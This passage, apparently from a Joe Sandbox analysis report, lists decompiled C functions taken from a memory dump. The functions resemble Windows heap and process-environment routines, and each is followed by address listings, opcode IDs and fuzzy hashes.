                                          • Instruction Fuzzy Hash: 24F090B29157909FF776971CC214B297FE49B29E70F5444AED5CE87206C6A4DCC0CA50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01162073 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 94%
                                          			E01162073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0115FD22(__ecx);
				_t19 =  *0x119849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1198748; // 0x0
					if(__eflags <= 0) {
						E01161C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1198724 & 0x00000004;
							if(( *0x1198724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1198724; // 0x0
					return E01158DF1(__ebx, 0xc0000374, 0x1195890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                          0x01162076
                                          0x01162078
                                          0x0116207d
                                          0x01162083
                                          0x011620a4
                                          0x011620aa
                                          0x011620ac
                                          0x011620b7
                                          0x011620ba
                                          0x011620bc
                                          0x011620c9
                                          0x011620c9
                                          0x011620d0
                                          0x011620d2
                                          0x00000000
                                          0x011620d2
                                          0x011620be
                                          0x011620c3
                                          0x011620c5
                                          0x011620c7
                                          0x00000000
                                          0x00000000
                                          0x011620c7
                                          0x011620bc
                                          0x011620d4
                                          0x01162085
                                          0x01162085
                                          0x011620a3
                                          0x011620a3

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5806a111c1accae77a9f94cfb83e3cbc1edcf02474c6d170efbd1a02b16aaaa4
                                          • Instruction ID: 292639c4f87a69ab5d8d544d931e317bdc1f4f9cffd18a3d64b9e082733efd5c
                                          • Opcode Fuzzy Hash: 5806a111c1accae77a9f94cfb83e3cbc1edcf02474c6d170efbd1a02b16aaaa4
                                          • Instruction Fuzzy Hash: EAF0A73B4155894ADF7F6B2D61113D93B9AD75A154B090455D87017209C73688E3CB10
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E927A Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E010E927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E010EFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E010E92C6(_t11, _t14);
				}
				return _t11;
			}





                                          0x010e9295
                                          0x010e9299
                                          0x010e929f
                                          0x010e92aa
                                          0x010e92ad
                                          0x010e92ae
                                          0x010e92af
                                          0x010e92b0
                                          0x010e92b4
                                          0x010e92bb
                                          0x010e92bb
                                          0x010e92c5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction ID: 4c9339904c6a6dc971ad4e8fcc57cce72383589951bf2eedb7a97377cd9d4be5
                                          • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                          • Instruction Fuzzy Hash: 4DE0E5722405016BEB219E0ACC84B4776A9AF92724F04407CB5005E242C6E5D80887A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178D34 Relevance: .0, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 43%
                                          			E01178D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x119d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E010C7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                          0x01178d34
                                          0x01178d43
                                          0x01178d4b
                                          0x01178d4e
                                          0x01178d52
                                          0x01178d5c
                                          0x01178d6e
                                          0x01178d5e
                                          0x01178d67
                                          0x01178d67
                                          0x01178d79
                                          0x01178d7a
                                          0x01178d7c
                                          0x01178d81
                                          0x01178d94

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 324c041ca1807ccf02b24e3dd5b6128de56b5d4de0efaed2388337dff705db78
                                          • Instruction ID: 8c5392fd2c866b74c0a428ce335b7279240f9ef551925af0681cb794d1b2e2ec
                                          • Opcode Fuzzy Hash: 324c041ca1807ccf02b24e3dd5b6128de56b5d4de0efaed2388337dff705db78
                                          • Instruction Fuzzy Hash: FEF0B470A04609AFDB18EFB9D545AAE77B4EF18700F508099E915EB380DA34D900CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178B58 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E01178B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x119d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E010C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x01178b67
                                          0x01178b6f
                                          0x01178b72
                                          0x01178b7d
                                          0x01178b8f
                                          0x01178b7f
                                          0x01178b88
                                          0x01178b88
                                          0x01178b9a
                                          0x01178b9b
                                          0x01178b9d
                                          0x01178ba2
                                          0x01178bb5

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 278a3bc6088ce8308b903bea0903b7279cbcd2e35be0794362b7b74cb74b24e4
                                          • Instruction ID: bcbbc392ad01fcb4abf6e14d4affbbb3c647336004e9acd51a1bbf1cb7f48723
                                          • Opcode Fuzzy Hash: 278a3bc6088ce8308b903bea0903b7279cbcd2e35be0794362b7b74cb74b24e4
                                          • Instruction Fuzzy Hash: DCF082B0A14259AFDF14EBA9D90AEBE77B4EF14700F440459BA15DB380EB34D900CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010C746D Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E010C746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E010BEB70(__ecx, 0x11979a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E010E95D0();
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                          0x010c746d
                                          0x010c746d
                                          0x010c746d
                                          0x010c7471
                                          0x010c7488
                                          0x0110f92d
                                          0x010c748e
                                          0x010c7491
                                          0x010c7495
                                          0x0110f937
                                          0x0110f93a
                                          0x0110f94e
                                          0x0110f953
                                          0x0110f956
                                          0x0110f956
                                          0x010c7495
                                          0x00000000
                                          0x010c7488
                                          0x010c7473
                                          0x010c7478
                                          0x010c747d
                                          0x010c7481
                                          0x00000000
                                          0x010c7481
                                          0x010c747d
                                          0x010c747a
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a74c34ad03d4ac05597623b32b56f5aef60f8bc6beeaaa97a302918692d60b70
                                          • Instruction ID: d6259b5b12b2e7692a29e8c4c4e09f927da47bcd4d3b25038a131024bd8c06fc
                                          • Opcode Fuzzy Hash: a74c34ad03d4ac05597623b32b56f5aef60f8bc6beeaaa97a302918692d60b70
                                          • Instruction Fuzzy Hash: 3DF0B434900145AADF5A976CC440BBEFFA2BF04A10F04025DD4D1A7191EB649801CF85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01178CD6 Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 36%
                                          			E01178CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x119d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E010C7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E010EB640(E010E9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                          0x01178ce5
                                          0x01178ced
                                          0x01178cf0
                                          0x01178cfb
                                          0x01178d0d
                                          0x01178cfd
                                          0x01178d06
                                          0x01178d06
                                          0x01178d18
                                          0x01178d19
                                          0x01178d1b
                                          0x01178d20
                                          0x01178d33

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 57b31cb8c8d99394b9121b427b143c43f556d977946eae39b04de1d150a88247
                                          • Instruction ID: a58004edf7915efd6bab697e3dc6c5cbd95351f4597f8f48fa4b6de466e951b4
                                          • Opcode Fuzzy Hash: 57b31cb8c8d99394b9121b427b143c43f556d977946eae39b04de1d150a88247
                                          • Instruction Fuzzy Hash: 41F08970904109AFDF04DBA9D549DAE77B4EF18200F540159E555EB380EA34D900CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010A4F2E Relevance: .0, Instructions: 31COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010A4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E011788F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E010CC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1081030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                          0x010a4f2e
                                          0x010a4f34
                                          0x010a4f38
                                          0x01100b85
                                          0x01100b85
                                          0x01100b89
                                          0x01100b9a
                                          0x01100b9a
                                          0x01100b9f
                                          0x00000000
                                          0x01100b9f
                                          0x01100b94
                                          0x01100b98
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01100b98
                                          0x010a4f3e
                                          0x010a4f48
                                          0x00000000
                                          0x010a4f6e
                                          0x00000000
                                          0x010a4f70

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 84b89401cbfed1971e7781ffd393dde741f1b11d7918df7a3fcc06b60b71b87c
                                          • Instruction ID: e39168f53eba5f4581aee95aa18707ac32ba341f823c68814ef14c459e0b600c
                                          • Opcode Fuzzy Hash: 84b89401cbfed1971e7781ffd393dde741f1b11d7918df7a3fcc06b60b71b87c
                                          • Instruction Fuzzy Hash: 16F0BE3A925E848FE777DB5CC244B22B7E8AB086B8F445464E44587AA2C7A4E980C740
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DA44B Relevance: .0, Instructions: 29COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010DA44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x1197b9c; // 0x0
				_t15 = __ecx;
				_t16 = L010C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E010EFA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                          0x010da44b
                                          0x010da453
                                          0x010da472
                                          0x010da476
                                          0x00000000
                                          0x010da493
                                          0x010da47a
                                          0x010da47f
                                          0x010da486
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 23630725927e79f2be13859b97f114f906dd2fb03e534e5942b91ea2bba0a39b
                                          • Instruction ID: 333704ec0072eb55d588304e13e339203d0b9c5396619edc9a7b7339c6a69ea0
                                          • Opcode Fuzzy Hash: 23630725927e79f2be13859b97f114f906dd2fb03e534e5942b91ea2bba0a39b
                                          • Instruction Fuzzy Hash: F8E09272B01422EBD2215B18EC00FAB73ADEBE4A51F0A4039E685C7254DA68DD01CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AF358 Relevance: .0, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E010AF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E010DF3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L010C4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                          0x010af35d
                                          0x010af361
                                          0x010af367
                                          0x010af372
                                          0x010af38c
                                          0x010af38c
                                          0x010af394

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction ID: 27724b876590b38ed41d62c90d182c434489cad07036992a2119cff73c5ad5fa
                                          • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                          • Instruction Fuzzy Hash: D8E0D833A40219FBDB3196D99D05F9EBFBCDB58AA0F018195BA44D7150D5619D00C6D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010BFF60 Relevance: .0, Instructions: 22COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010BFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x10811a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E011788F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E010C0050(_t14);
				}
			}










                                          0x010bff66
                                          0x010bff6b
                                          0x00000000
                                          0x010bff8f
                                          0x00000000
                                          0x010bff8f

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94719e63d12c2a7e8645b75d1fbdf6d768ffc4cd52dd22172b23cc92a2a2e88f
                                          • Instruction ID: 1561ff7a3284ceaec60361d9a39846443c9aff05c57cee7c25bd750da594d49f
                                          • Opcode Fuzzy Hash: 94719e63d12c2a7e8645b75d1fbdf6d768ffc4cd52dd22172b23cc92a2a2e88f
                                          • Instruction Fuzzy Hash: 3DE0DFB0609207DFDB39DB59D8C0FA93BE8DF52721F1AC09DF0884B102C661D881C68A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011341E8 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E011341E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x11808f0);
				_t5 = E010FD08C(__ebx, __edi, __esi);
				if( *0x11987ec == 0) {
					E010BEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x11987ec == 0) {
						 *0x11987f0 = 0x11987ec;
						 *0x11987ec = 0x11987ec;
						 *0x11987e8 = 0x11987e4;
						 *0x11987e4 = 0x11987e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L01134248();
				}
				return E010FD0D1(_t5);
			}





                                          0x011341e8
                                          0x011341ea
                                          0x011341ef
                                          0x011341fb
                                          0x01134206
                                          0x0113420b
                                          0x01134216
                                          0x0113421d
                                          0x01134222
                                          0x0113422c
                                          0x01134231
                                          0x01134231
                                          0x01134236
                                          0x0113423d
                                          0x0113423d
                                          0x01134247

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21925aaec2e184e0cf3224d37ef5fb547262a2f14b1311ce21bd81d54814825a
                                          • Instruction ID: 127a92d93195157da180f0e109cd5b542a2b3a622b0862669c5b5b11a539c8fc
                                          • Opcode Fuzzy Hash: 21925aaec2e184e0cf3224d37ef5fb547262a2f14b1311ce21bd81d54814825a
                                          • Instruction Fuzzy Hash: D4F01574820B09DECBBCEFA9E50074C36B4F796310F00812A9174A7AEAC73464E4CF01
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0115D380 Relevance: .0, Instructions: 21COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0115D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L010AE8B0(__ecx, _a4, 0xfff);
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                          0x0115d38a
                                          0x0115d39b
                                          0x0115d3b1
                                          0x00000000
                                          0x0115d3b6
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction ID: 1ccfd2f465e10f0af96501877aafa908209c9f665bcc464586af711841a09d99
                                          • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                          • Instruction Fuzzy Hash: CBE0C231284209FBEF265F84DC00FA97B16EB50BA0F104031FE485A691C7719C91DBC4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DA185 Relevance: .0, Instructions: 20COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010DA185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x11967e4 >= 0xa) {
					if(_t5 < 0x1196800 || _t5 >= 0x1196900) {
						return L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E010C0010(0x11967e0, _t5);
				}
			}





                                          0x010da190
                                          0x010da1a6
                                          0x010da1c2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x010da192
                                          0x010da192
                                          0x010da19f
                                          0x010da19f

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebc837048a7fc3b54f4ec6644fc85f98f91e2be97422605885a525af3e98452f
                                          • Instruction ID: f49bbd777eb2fbf529f610c6a1cf0d77d0d9196f34a0bff06daee6d5a57d08e3
                                          • Opcode Fuzzy Hash: ebc837048a7fc3b54f4ec6644fc85f98f91e2be97422605885a525af3e98452f
                                          • Instruction Fuzzy Hash: DED02B712211009ACB2E13208E14BAD3212F780B90F34840CF2A70B5A4EB5098D0D528
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D16E0 Relevance: .0, Instructions: 17COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010D16E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E010D1710(0x11967e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L010C4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                          0x010d16e8
                                          0x010d16ef
                                          0x010d16f3
                                          0x010d16fe
                                          0x00000000
                                          0x010d1700
                                          0x010d170d
                                          0x010d170d
                                          0x010d16f2
                                          0x010d16f2
                                          0x010d16f2
                                          0x010d16f2

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d14983ee73287785c56624a53f83e7b48256cf60e9862edf41ea8a9461bfcd24
                                          • Instruction ID: 5037770ae9945519d560173097497aab928af89a83fa0c9065e797477dc115f6
                                          • Opcode Fuzzy Hash: d14983ee73287785c56624a53f83e7b48256cf60e9862edf41ea8a9461bfcd24
                                          • Instruction Fuzzy Hash: B9D0A771100301A2EE2D5B14AC14B1826A1FF94B81F38009CF247594D0CFB0DC93E458
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011253CA Relevance: .0, Instructions: 16COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E011253CA(void* __ebx) {
				intOrPtr _t7;
				void* _t13;
				void* _t14;
				intOrPtr _t15;
				void* _t16;

				_t13 = __ebx;
				if( *((char*)(_t16 - 0x65)) != 0) {
					E010BEB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					_t7 =  *((intOrPtr*)(_t16 - 0x64));
					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
				}
				if(_t15 != 0) {
					L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
					return  *((intOrPtr*)(_t16 - 0x64));
				}
				return _t7;
			}








                                          0x011253ca
                                          0x011253ce
                                          0x011253d9
                                          0x011253de
                                          0x011253e1
                                          0x011253e1
                                          0x011253e6
                                          0x011253f3
                                          0x00000000
                                          0x011253f8
                                          0x011253fb

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction ID: 8a378e9b5ed86ae4d7b1557c7fbe3f7e0555cc697aee49b5ec62898c797bd0e3
                                          • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                          • Instruction Fuzzy Hash: 88E08C319046849BCF16DB88C690FCEBBF6FB84B00F140008E0485B620C724AC00CB00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010BAAB0 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E010BAAB0() {
				intOrPtr* _t4;

				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t4 != 0) {
					if( *_t4 == 0) {
						goto L1;
					} else {
						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
					}
				} else {
					L1:
					return 0x7ffe0030;
				}
			}




                                          0x010baab6
                                          0x010baabb
                                          0x0110a442
                                          0x00000000
                                          0x0110a448
                                          0x0110a454
                                          0x0110a454
                                          0x010baac1
                                          0x010baac1
                                          0x010baac6
                                          0x010baac6

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                          • Instruction ID: a0efa2b653302e8f8f7d6cf4d57795c9f307b01eb00bf4385bd950743d010f48
                                          • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
